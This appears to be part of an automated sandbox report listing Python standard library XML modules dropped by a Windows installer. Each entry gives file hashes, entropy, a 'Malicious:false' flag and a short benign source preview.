                                                                                                                                Preview:"""Registration facilities for DOM. This module should not be used..directly. Instead, the functions getDOMImplementation and..registerDOMImplementation should be imported from xml.dom."""....# This is a list of well-known implementations. Well-known names..# should be published by posting to xml-sig@python.org, and are..# subsequently recorded in this file.....import sys....well_known_implementations = {.. 'minidom':'xml.dom.minidom',.. '4DOM': 'xml.dom.DOMImplementation',.. }....# DOM implementations not officially registered should register..# themselves with their....registered = {}....def registerDOMImplementation(name, factory):.. """registerDOMImplementation(name, factory).... Register the factory function with the name. The factory function.. should return an object which implements the DOMImplementation.. interface. The factory function can either return the same object,.. or a new one (e.g. if that implementation supports some.. customization).""".
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):36732
                                                                                                                                Entropy (8bit):4.5132853402230415
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:9Ds8sGC94+qzyp1sIwoDrvkiG9OxBbTgQlBt0UKmYKWk8:ps8sGz+pPvk6tlnKFbk8
                                                                                                                                MD5:38D0AC2BBD9BF4DDD21D39F4FD1CC1B8
                                                                                                                                SHA1:AFA36F46D59371414FCCE5468D32F55D962BF9BE
                                                                                                                                SHA-256:23C2A6BDFE9D22C3587967CE02754E7366FE93CD087244774F6B37AE902F1F74
                                                                                                                                SHA-512:37AEFCEAF9808AACA55DD4F92577DF04B32CC1D228CD968D3C9B5A56F8CD56088772E1DE8395069342A6B24CA28F61D4FFEE7EB95E54BCAA921951B7A8744F1A
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Facility to use the Expat parser to load a minidom instance..from a string or file.....This avoids all the overhead of SAX and pulldom to gain performance..."""....# Warning!..#..# This module is tightly bound to the implementation details of the..# minidom DOM and can't be used with other DOM implementations. This..# is due, in part, to a lack of appropriate methods in the DOM (there is..# no way to create Entity and Notation nodes via the DOM Level 2..# interface), and for performance. The latter is the cause of some fairly..# cryptic code...#..# Performance hacks:..#..# - .character_data_handler() has an extra case in which continuing..# data is appended to an existing Text node; this can be a..# speedup since pyexpat can break up character data into multiple..# callbacks even though we set the buffer_text attribute on the..# parser. This also gives us the advantage that we don't need a..# separate normalization pass...#..# - Determining that a n
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):3476
                                                                                                                                Entropy (8bit):4.360383579682768
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:XNI6TlDr7wscbZSjiqukQsyVhn6HmwxmgMqS:ddRr7pRHyVZwMp
                                                                                                                                MD5:D2C69B5B30E8E272B3FCDFACBC139787
                                                                                                                                SHA1:9361E0D6B31BE99CCA23EE02E47A5DF2DD7FF0E3
                                                                                                                                SHA-256:99AE261E514DE6D47A11FF572D7139EB9DBCC70696E3F6710BB17543F321F4AE
                                                                                                                                SHA-512:F5C4784B9C4204AB2900FC4AF7F26B519A46A87E3E5DCD67B2217737060196AE9BEC1D65A0F15C92CBF6F4D99DC1737B76A6F70FE853C06CF3FDFA1AF60E0F9F
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Python version compatibility support for minidom.....This module contains internal implementation details and..should not be imported; use xml.dom.minidom instead..."""....# This module should only be imported using "import *"...#..# The following names are defined:..#..# NodeList -- lightest possible NodeList implementation..#..# EmptyNodeList -- lightest possible NodeList that is guaranteed to..# remain empty (immutable)..#..# StringTypes -- tuple of defined string types..#..# defproperty -- function used in conjunction with GetattrMagic;..# using these together is needed to make them work..# as efficiently as possible in both Python 2.2+..# and older versions. For example:..#..# class MyClass(GetattrMagic):..# def _get_myattr(self):..# return something..#..# defproperty(MyClass, "myatt
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):70153
                                                                                                                                Entropy (8bit):4.476788952132246
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:f0k5awIUnDnAOwF1qHc9vYeacmaKl/LfH16BvYfcAe:VAOwFkoacmaKVS
                                                                                                                                MD5:C0215FF60862F3669375E31EE79C3E97
                                                                                                                                SHA1:9D4A464057ACCE90FBFF95AAC6A5DDE4F23E5848
                                                                                                                                SHA-256:BF34C3B98EE710C14EB5D550991BB4DDF133187A4E339D655CFAA6E4BA98FB20
                                                                                                                                SHA-512:C8174BFDCE880CD5D6E7AD609609026CBB589A1BFF9D2F2165A19D82F7B8D8A593F238F90A3F91F614A0A570596E8C5DAD57DB3A584048FF8E793AB5CEA97D8A
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Simple implementation of the Level 1 DOM.....Namespaces and other minor Level 2 features are also supported.....parse("foo.xml")....parseString("<foo><bar/></foo>")....Todo:..=====.. * convenience methods for getting elements and text... * more testing.. * bring some of the writer and linearizer code into conformance with this.. interface.. * SAX 2 namespaces.."""....import io..import xml.dom....from xml.dom import EMPTY_NAMESPACE, EMPTY_PREFIX, XMLNS_NAMESPACE, domreg..from xml.dom.minicompat import *..from xml.dom.xmlbuilder import DOMImplementationLS, DocumentLS....# This is used by the ID-cache invalidation checks; the list isn't..# actually complete, since the nodes being checked will never be the..# DOCUMENT_NODE or DOCUMENT_FRAGMENT_NODE. (The node being checked is..# the node being added or removed, not the node being modified.)..#.._nodeTypes_with_children = (xml.dom.Node.ELEMENT_NODE,.. xml.dom.Node.ENTITY_REFERENCE_NODE)......class Node(
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):11973
                                                                                                                                Entropy (8bit):4.563349863402665
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:X+UnLXkCP+QE9H9PU1IeBZGiZqQgAq5e8QHqGhe3+BN+x+vjtUH2GppO0Cphgd8o:/LGiktGMtUl0p1CW8T1oqVw
                                                                                                                                MD5:B1A5FB5EB8D364CBD286897FAEA71FDB
                                                                                                                                SHA1:D38FD61ABBCC6E679473894488547F778AA414EC
                                                                                                                                SHA-256:C9BE4D62E6A7472357148685D34F462F2042CBEA5C2A14D54298FA35B62AEE91
                                                                                                                                SHA-512:84DFDE99DF415DB3C2081E11941EA1281AB87EE644824BD2D51D167700516E06E255EAE6DF8D7F8C7E1C989FF26E153014BF99857810316FCF7EA6818F7F44DA
                                                                                                                                Malicious:false
                                                                                                                                Preview:import xml.sax..import xml.sax.handler....START_ELEMENT = "START_ELEMENT"..END_ELEMENT = "END_ELEMENT"..COMMENT = "COMMENT"..START_DOCUMENT = "START_DOCUMENT"..END_DOCUMENT = "END_DOCUMENT"..PROCESSING_INSTRUCTION = "PROCESSING_INSTRUCTION"..IGNORABLE_WHITESPACE = "IGNORABLE_WHITESPACE"..CHARACTERS = "CHARACTERS"....class PullDOM(xml.sax.ContentHandler):.. _locator = None.. document = None.... def __init__(self, documentFactory=None):.. from xml.dom import XML_NAMESPACE.. self.documentFactory = documentFactory.. self.firstEvent = [None, None].. self.lastEvent = self.firstEvent.. self.elementStack = [].. self.push = self.elementStack.append.. try:.. self.pop = self.elementStack.pop.. except AttributeError:.. # use class' pop instead.. pass.. self._ns_contexts = [{XML_NAMESPACE:'xml'}] # contains uri -> prefix dicts.. self._current_context = self._ns_contexts[-1].. self.
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):12774
                                                                                                                                Entropy (8bit):4.580280924284623
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:Bzlret/w/z/0/yt/i/p/V/l/T/3AjbDFNPO0NOG624BhDXYkYKNfAjXZH5ax4h4i:BzdeoDY24BhDXYkYKNfyZH2BAM+
                                                                                                                                MD5:881BBEEF94F77A78DC5BEB0DAA5CFF2A
                                                                                                                                SHA1:50271F31FEEE68760223DF29B5E9E46A0BCC9EA8
                                                                                                                                SHA-256:B02D7ACAD7E45931DCAE85209134B345AE94E4845AF40DCC06311A5948EB157F
                                                                                                                                SHA-512:39EBF5DF5C267E4E364C92AA5E3DD9094D1F83C7204185AC486C2753A310723B3C95E83CD3280576D4EA037784A88F2860B69DA8183BCF320AAD2F83AA611E04
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Implementation of the DOM Level 3 'LS-Load' feature."""....import copy..import xml.dom....from xml.dom.NodeFilter import NodeFilter......__all__ = ["DOMBuilder", "DOMEntityResolver", "DOMInputSource"]......class Options:.. """Features object that has variables set for each DOMBuilder feature..... The DOMBuilder class uses an instance of this class to pass settings to.. the ExpatBuilder class... """.... # Note that the DOMBuilder class in LoadSave constrains which of these.. # values can be set using the DOM Level 3 LoadSave feature..... namespaces = 1.. namespace_declarations = True.. validation = False.. external_parameter_entities = True.. external_general_entities = True.. external_dtd_subset = True.. validate_if_schema = False.. validate = False.. datatype_normalization = False.. create_entity_ref_nodes = True.. entities = True.. whitespace_in_element_content = True.. cdata_sections = True.. comments = True.. charset
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):7067
                                                                                                                                Entropy (8bit):4.831830451126932
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:CWMqEix5fu5TrKmJ+GAVXJbB7Z6S3h3f5zTRA76z4:CVOx5fu5HKmczXJNNh5K
                                                                                                                                MD5:8993D36D13E13BC403F006D7E85C3C75
                                                                                                                                SHA1:0B2D3255AB1754396E27D7F93A8ECE2F868D6E3A
                                                                                                                                SHA-256:7B5DA3456C23CF25459EB3C95B063F3C9B623ED50EE70135E9DFE72D100B1D4E
                                                                                                                                SHA-512:51048EEE9CA100488570045FCA6C19F953A70B7E5519830B80AEA3E18B7B96A2073C1C1B1FFC0EFE845041E64EBA56AAB050167EC3F3CFCFB73C5B8BA4CC1C78
                                                                                                                                Malicious:false
                                                                                                                                Preview:#..# ElementTree..# $Id: ElementInclude.py 3375 2008-02-13 08:05:08Z fredrik $..#..# limited xinclude support for element trees..#..# history:..# 2003-08-15 fl created..# 2003-11-14 fl fixed default loader..#..# Copyright (c) 2003-2004 by Fredrik Lundh. All rights reserved...#..# fredrik@pythonware.com..# http://www.pythonware.com..#..# --------------------------------------------------------------------..# The ElementTree toolkit is..#..# Copyright (c) 1999-2008 by Fredrik Lundh..#..# By obtaining, using, and/or copying this software and/or its..# associated documentation, you agree that you have read, understood,..# and will comply with the following terms and conditions:..#..# Permission to use, copy, modify, and distribute this software and..# its associated documentation for any purpose and without fee is..# hereby granted, provided that the above copyright notice appears in..# all copies, and that both that copyright notice and this permission..# notice appear in supporting
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):14420
                                                                                                                                Entropy (8bit):4.520096130525027
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:g0zEix5fu5TNcNZdmNpwvbKRLsPc8CeSnb9xZDkvb7RLEqt2dIIS6c:vx5fu5xKdcSt9N
                                                                                                                                MD5:CF1580075B75398D1BA2D658C24C6621
                                                                                                                                SHA1:01B648A7F14A09250FF6BEA45110015568787B3B
                                                                                                                                SHA-256:9CF2C5248524016C9044BDFE5F81AC1C9AD6EDC0A04AC8433A33EAD7F7D52413
                                                                                                                                SHA-512:C583575AA80A778DCE82F997D5626926B50192B516EE207A509123C5188D9CCB0FD4DCC6E2654435B1EB05491CFDEA95682056A99F193F46D4A0E5DA78A7927E
                                                                                                                                Malicious:false
                                                                                                                                Preview:#..# ElementTree..# $Id: ElementPath.py 3375 2008-02-13 08:05:08Z fredrik $..#..# limited xpath support for element trees..#..# history:..# 2003-05-23 fl created..# 2003-05-28 fl added support for // etc..# 2003-08-27 fl fixed parsing of periods in element names..# 2007-09-10 fl new selection engine..# 2007-09-12 fl fixed parent selector..# 2007-09-13 fl added iterfind; changed findall to return a list..# 2007-11-30 fl added namespaces support..# 2009-10-30 fl added child element value filter..#..# Copyright (c) 2003-2009 by Fredrik Lundh. All rights reserved...#..# fredrik@pythonware.com..# http://www.pythonware.com..#..# --------------------------------------------------------------------..# The ElementTree toolkit is..#..# Copyright (c) 1999-2009 by Fredrik Lundh..#..# By obtaining, using, and/or copying this software and/or its..# associated documentation, you agree that you have read, understood,..# and will comply with the following terms and conditions:..#..# Pe
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):75887
                                                                                                                                Entropy (8bit):4.4342238869840385
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:9OYE5pEGJLTyBay0Ob0itUkdN0EK0yalzjdm/Xi69w6nYCOTONCw4zUIZ4FR4HoM:vE8Ui6961XFp1Z
                                                                                                                                MD5:3F86D9C40074EC6C50785D7C2A394A26
                                                                                                                                SHA1:94E2A71AA9C3E733E70BAD0ED1C3FC18656CFB95
                                                                                                                                SHA-256:23568C74E60527F84F88468E37325BAF76920E762F4828BE6C431B620EAAE70F
                                                                                                                                SHA-512:6C91E142424E7C60EC498335028448982292916DFBCFE6484EA496E0DCC98F176976B4FDE775073AD298F456C29C34EB94F4207B52EFAF99183DD3AA9A92284C
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Lightweight XML support for Python..... XML is an inherently hierarchical data format, and the most natural way to.. represent it is with a tree. This module has two classes for this purpose:.... 1. ElementTree represents the whole XML document as a tree and.... 2. Element represents a single node in this tree..... Interactions with the whole document (reading and writing to/from files) are.. usually done on the ElementTree level. Interactions with a single XML element.. and its sub-elements are done on the Element level..... Element is a flexible container object designed to store hierarchical data.. structures in memory. It can be described as a cross between a list and a.. dictionary. Each Element has a number of properties associated with it:.... 'tag' - a string containing the element's name..... 'attributes' - a Python dictionary storing the element's attributes..... 'text' - a string containing the element's text content..... 'tail' - an optional string c
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1638
                                                                                                                                Entropy (8bit):5.18485092184187
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:JpfxgRJmdYYCYN7ktbjBHv9qm2c+Eq6ZaLyxDDGC8xGtuzYsrswF30CAH:JxlCYCdlZ2qtMyxDl8QuzYsxF30h
                                                                                                                                MD5:074C97369CF6D6AB3C81A90A2EA48000
                                                                                                                                SHA1:82AC462EB51C6BB4A524F2FA2E6A611A8141B3C4
                                                                                                                                SHA-256:A2006C512205BA0E5C96B2A4BDCFF89BFDD02F18EF076F3E1FC70F11CED93423
                                                                                                                                SHA-512:51B140D0C5C537107CDB8BB9546672BE4AE35307B5EE1281D8D55DEBED6066632A96EFB5B43DBC2EF4DAF452531651CEDF66ECFDE9A1C5E037274E4381424CAC
                                                                                                                                Malicious:false
                                                                                                                                Preview:# $Id: __init__.py 3375 2008-02-13 08:05:08Z fredrik $..# elementtree package....# --------------------------------------------------------------------..# The ElementTree toolkit is..#..# Copyright (c) 1999-2008 by Fredrik Lundh..#..# By obtaining, using, and/or copying this software and/or its..# associated documentation, you agree that you have read, understood,..# and will comply with the following terms and conditions:..#..# Permission to use, copy, modify, and distribute this software and..# its associated documentation for any purpose and without fee is..# hereby granted, provided that the above copyright notice appears in..# all copies, and that both that copyright notice and this permission..# notice appear in supporting documentation, and that the name of..# Secret Labs AB or the author not be used in advertising or publicity..# pertaining to distribution of the software without specific, written..# prior permission...#..# SECRET LABS AB AND THE AUTHOR DISCLAIMS ALL WARRANTIES
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):85
                                                                                                                                Entropy (8bit):4.094248662638836
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:SSXFKCWEkUnexXtJd0kUnexXBVKBiv:SSXFKCWlR/d1RBgBM
                                                                                                                                MD5:94DD5DD6A9695867E33608F69F470973
                                                                                                                                SHA1:D20B89CFD1E442F114279F1AE7FE1934FEAFF5CE
                                                                                                                                SHA-256:A42C14E24D69C79D1A1462486DC28CED30875787CB9407BD56A62CCE83C349A1
                                                                                                                                SHA-512:FE36B9CF3837F490FB1D0A528C59191E8DF521FD84C791918E63FD47F0E4560E848EF087EB681C5678A79C413F480D5F178F5E65D34CC90F5D629899D0520E9F
                                                                                                                                Malicious:false
                                                                                                                                Preview:# Deprecated alias for xml.etree.ElementTree....from xml.etree.ElementTree import *..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):175
                                                                                                                                Entropy (8bit):4.573436576270062
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qQFMLm/rKHnvKFVvlGtMiFKLsWuRbpSMVAVQvE9CTLV40KGlVQLG:NFKyeHvKFVvlG+psWuRlKV6EcLV40KCb
                                                                                                                                MD5:A1215D8FFF352A77ED03AB2CC1A993E3
                                                                                                                                SHA1:4E6140E6FD55FC0CCB9D3FA0A9290ED103ECA4EA
                                                                                                                                SHA-256:D78A708D6CFDCCD02037DEBB3E65D5815C82A0BA66EEC2AABAC29AC730B5D230
                                                                                                                                SHA-512:1A71F91BBAA01D830F8A1803253C71AC280FDDACEC016734E3EBC1B2DF5B0CB3A1CE26A0A7D6B9B31E0EF7420108A5D567C9E65F562B994E102544916E414EE1
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Python interfaces to XML parsers.....This package contains one module:....expat -- Python wrapper for James Clark's Expat parser, with namespace.. support....."""..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):256
                                                                                                                                Entropy (8bit):4.629746376425819
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:KggKLInBLCIyyMIg3YbZVlwyz/yVHWtqdvtRv:KHKQFBKAZVlw2yhwqdlJ
                                                                                                                                MD5:461E0DF49035F4534652570F0826A0A7
                                                                                                                                SHA1:64AD783C4949FC9663850B63FF71BC381F03924C
                                                                                                                                SHA-256:4FCCB4BC00F1BA7BAAC14413B180C87A34A77D49A854F1AD9FBCA199DFC2DDEB
                                                                                                                                SHA-512:31577124F11DE96AFCA30EEAA6FD16D27539816BA5CC3B77145848DCFEB4B1DC39F27851564DA68370715070F3CE1918195203AF9AAD7AF2DC0DFD4E7FC58D9A
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Interface to the Expat non-validating XML parser."""..import sys....from pyexpat import *....# provide pyexpat submodules as xml.parsers.expat submodules..sys.modules['xml.parsers.expat.model'] = model..sys.modules['xml.parsers.expat.errors'] = errors..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):3749
                                                                                                                                Entropy (8bit):4.699349088053993
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:19GFuSxi6JQ8KCybCddb4NDQm4LkugDiqyzIWDxsJz+aDeKlAZGJp2:yFuSLK64NDR4LkugDidJSx+aDeKlhJp2
                                                                                                                                MD5:DCABA6CA5D8E6F30213653013E658E2D
                                                                                                                                SHA1:AEB9EBE3511619B796289EA34041F85A85A4D314
                                                                                                                                SHA-256:F8326E5CA606923225E0683D7391F4CF94B74B90A2833DBBD3A85749BFEC8037
                                                                                                                                SHA-512:108E3795D22ECE57BEB099B30C6A6DD72C7470C223B033A33771155D99B5F11654D2F8A0E90E3C81FF4A44201B4E746FCBD44F41EC4ABFD4ED087A87BE002FEC
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Simple API for XML (SAX) implementation for Python.....This module provides an implementation of the SAX 2 interface;..information about the Java version of the interface can be found at..http://www.megginson.com/SAX/. The Python version of the interface is..documented at <...>.....This package contains the following modules:....handler -- Base classes and constants which define the SAX 2 API for.. the 'client-side' of SAX for Python.....saxutils -- Implementation of the convenience classes commonly used to.. work with SAX.....xmlreader -- Base classes and constants which define the SAX 2 API for.. the parsers used with SAX for Python.....expatreader -- Driver that allows use of the Expat parser with SAX..."""....from .xmlreader import InputSource..from .handler import ContentHandler, ErrorHandler..from ._exceptions import SAXException, SAXNotRecognizedException, \.. SAXParseException, SAXNotSupportedException, \..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):4916
                                                                                                                                Entropy (8bit):4.666905739881215
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:w0r1ndizbCoIVsKStRocihjQL7J57veOPwLr:w0pnduJusK6/LPwLr
                                                                                                                                MD5:A4EA3AE8669415291EE47B26A159D06C
                                                                                                                                SHA1:3E77875E551F84FB1CB162D7218973024172C4E2
                                                                                                                                SHA-256:0F2B2D27FBDC156CB45BBB74CEBFF77DA28D6A2F6F4E60A263138314CE016442
                                                                                                                                SHA-512:DAC6795C6DD87C2C54E9C2D57518A16687D0C6EE1C7A7A6525E66B1A4BFC49E4BEBBC8162A9931904B6CECBD93F6187C85960EA5604641D0C4A03FE8B984F066
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Different kinds of SAX Exceptions"""..import sys..if sys.platform[:4] == "java":.. from java.lang import Exception..del sys....# ===== SAXEXCEPTION =====....class SAXException(Exception):.. """Encapsulate an XML error or warning. This class can contain.. basic error or warning information from either the XML parser or.. the application: you can subclass it to provide additional.. functionality, or to add localization. Note that although you will.. receive a SAXException as the argument to the handlers in the.. ErrorHandler interface, you are not actually required to raise.. the exception; instead, you can simply read the information in.. it.""".... def __init__(self, msg, exception=None):.. """Creates an exception. The message is required, but the exception.. is optional.""".. self._msg = msg.. self._exception = exception.. Exception.__init__(self, msg).... def getMessage(self):.. "Return a message for this e
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):16173
                                                                                                                                Entropy (8bit):4.410936195612219
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:0KZWK6TjrSPHVGFG//al1IDxNWYzCz3vZUcRoKGTGI63PgYd:0K/2+PHclWDbWYzS3vZU3wd
                                                                                                                                MD5:E79FF76334B22E81DA14019971047BF4
                                                                                                                                SHA1:365E516DB41ED9651F01BB8215A3B353B509D550
                                                                                                                                SHA-256:F58400B633D9A335AA12B01CFD6A00A6EC2EAC57CD4D56357AA784630BEB81BF
                                                                                                                                SHA-512:71E9C81745FEF5727DB7DFF5419558CB5B41F2C4406D22AA7A9B6D1820C4AC5D0FA69B83F85B2C007CECFD7B46DF0326EC9329748BF154427B002919082DC2BF
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""..SAX driver for the pyexpat C module. This driver works with..pyexpat.__version__ == '2.22'..."""....version = "0.20"....from xml.sax._exceptions import *..from xml.sax.handler import feature_validation, feature_namespaces..from xml.sax.handler import feature_namespace_prefixes..from xml.sax.handler import feature_external_ges, feature_external_pes..from xml.sax.handler import feature_string_interning..from xml.sax.handler import property_xml_string, property_interning_dict....# xml.parsers.expat does not raise ImportError in Jython..import sys..if sys.platform[:4] == "java":.. raise SAXReaderNotAvailable("expat not available in Java", None)..del sys....try:.. from xml.parsers import expat..except ImportError:.. raise SAXReaderNotAvailable("expat not supported", None)..else:.. if not hasattr(expat, "ParserCreate"):.. raise SAXReaderNotAvailable("expat not supported", None)..from xml.sax import xmlreader, saxutils, handler....AttributesImpl = xmlreader.Attributes
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):16004
                                                                                                                                Entropy (8bit):4.592153043273041
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:4qs2ueE1Ra1tObpUTJLikEojAhSWyMiojpYXlDBDbdmw4Q:4DXVRaLyfjSWynojpYXlDBDbdm9Q
                                                                                                                                MD5:9FD26A93F62E24979039A131066BA573
                                                                                                                                SHA1:5EB5E8573F03B12C49A3C56A54ADAA18CB5F3DF9
                                                                                                                                SHA-256:788A465AF38EFB19485A4E27389D5DE072AEA2F9BC20E5DC1BEDC7E9708B4340
                                                                                                                                SHA-512:08573961DC60928FA90D93DA4B716FDB4B8199C7FA6C70796D4FCB66A90C7ADA372331CB7520C65DF91A139DCC9EA604C17836A788C909FD17C4820E09718BB1
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""..This module contains the core classes of version 2.0 of SAX for Python...This file provides only default classes with absolutely minimum..functionality, from which drivers and applications can be subclassed.....Many of these classes are empty and are included only as documentation..of the interfaces.....$Id$.."""....version = '2.0beta'....#============================================================================..#..# HANDLER INTERFACES..#..#============================================================================....# ===== ERRORHANDLER =====....class ErrorHandler:.. """Basic interface for SAX error handlers..... If you create an object that implements this interface, then.. register the object with your XMLReader, the parser will call the.. methods in your object to report all warnings and errors. There.. are three levels of errors available: warnings, (possibly).. recoverable errors, and unrecoverable errors. All methods take a.. SAXParseException as
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):12624
                                                                                                                                Entropy (8bit):4.5952127069012025
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:2BZS9XS6KXSZcmTXS2uSTZtk8X2b6R/tNG/ITciShlu5R0C8/NfdEzQxW8/NAdRX:aseOJLYwoiShlcR/q0R
                                                                                                                                MD5:F8DA395195C50B93F5B98FCE2B9A66BA
                                                                                                                                SHA1:37A9EA4DE074B99D7A89A3CA96B572C6FEB5ABF0
                                                                                                                                SHA-256:3EC6D8E4A1414EE7C52E23A58DBCECE9653021705A4D0C0ABA0E96961258C5F3
                                                                                                                                SHA-512:FA6BAC28F9E5B172BED521C3B6C70891142C153F0FB9ADC50FB061E6B21F419884503FDF61DA1F6B213D9C30388B7567973EBA18A226A8EDDAE7EB64D9963D96
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""\..A library of useful helper classes to the SAX classes, for the..convenience of application and driver writers..."""....import os, urllib.parse, urllib.request..import io..import codecs..from . import handler..from . import xmlreader....def __dict_replace(s, d):.. """Replace substrings of a string using a dictionary.""".. for key, value in d.items():.. s = s.replace(key, value).. return s....def escape(data, entities={}):.. """Escape &, <, and > in a string of data..... You can escape other strings of data by passing a dictionary as.. the optional entities parameter. The keys and values must all be.. strings; each key will be replaced with its corresponding value... """.... # must do ampersand first.. data = data.replace("&", "&amp;").. data = data.replace(">", "&gt;").. data = data.replace("<", "&lt;").. if entities:.. data = __dict_replace(data, entities).. return data....def unescape(data, entities={}):.. """Unescape &
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):13064
                                                                                                                                Entropy (8bit):4.556180565319411
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:WVqdHW8XYeKyLtX11v5uMHGBnxUKZBwyQ:WqVN11v5uQswH
                                                                                                                                MD5:3C79D7C0496DEFB97BA38D6D8694DF2E
                                                                                                                                SHA1:C68111C048B67FF204F5953819CFBCFA1416BBB3
                                                                                                                                SHA-256:947AF33F545305A6853771B5C1E831D2958F69998AAEF48A9F0C133516D2C47F
                                                                                                                                SHA-512:CEAB05B1AB504D1ACB6C36E2AF4F4D855F6636EA983DE18AF691E84A3F16E25EF9675CB73D7DA3FBBAD3D1232377A3F29E832881680F8A358DA6BBD427B0DA41
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""An XML Reader is the SAX 2 name for an XML parser. XML Parsers..should be based on this code. """....from . import handler....from ._exceptions import SAXNotSupportedException, SAXNotRecognizedException......# ===== XMLREADER =====....class XMLReader:.. """Interface for reading an XML document using callbacks..... XMLReader is the interface that an XML parser's SAX2 driver must.. implement. This interface allows an application to set and query.. features and properties in the parser, to register event handlers.. for document processing, and to initiate a document parse..... All SAX interfaces are assumed to be synchronous: the parse.. methods must not return until parsing is complete, and readers.. must wait for an event-handler callback to return before reporting.. the next event.""".... def __init__(self):.. self._cont_handler = handler.ContentHandler().. self._dtd_handler = handler.DTDHandler().. self._ent_handler = handler.Entit
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):39
                                                                                                                                Entropy (8bit):4.2336188853070205
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:SbF8tHyxVWSov:SbFUHoVjov
                                                                                                                                MD5:F8259102DFC36D919A899CDB8FDE48CE
                                                                                                                                SHA1:4510C766809835DAB814C25C2223009EB33E633A
                                                                                                                                SHA-256:52069AEEFB58DAD898781D8BDE183FFDA18FAAE11F17ACE8CE83368CAB863FB1
                                                                                                                                SHA-512:A77C8A67C95D49E353F903E3BD394E343C0DFA633DCFFBFD7C1B34D5E1BDFB9A372ECE71360812E44C5C5BADFA0FC81387A6F65F96616D6307083C2B3BB0213F
                                                                                                                                Malicious:false
                                                                                                                                Preview:# This directory is a Python package...
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
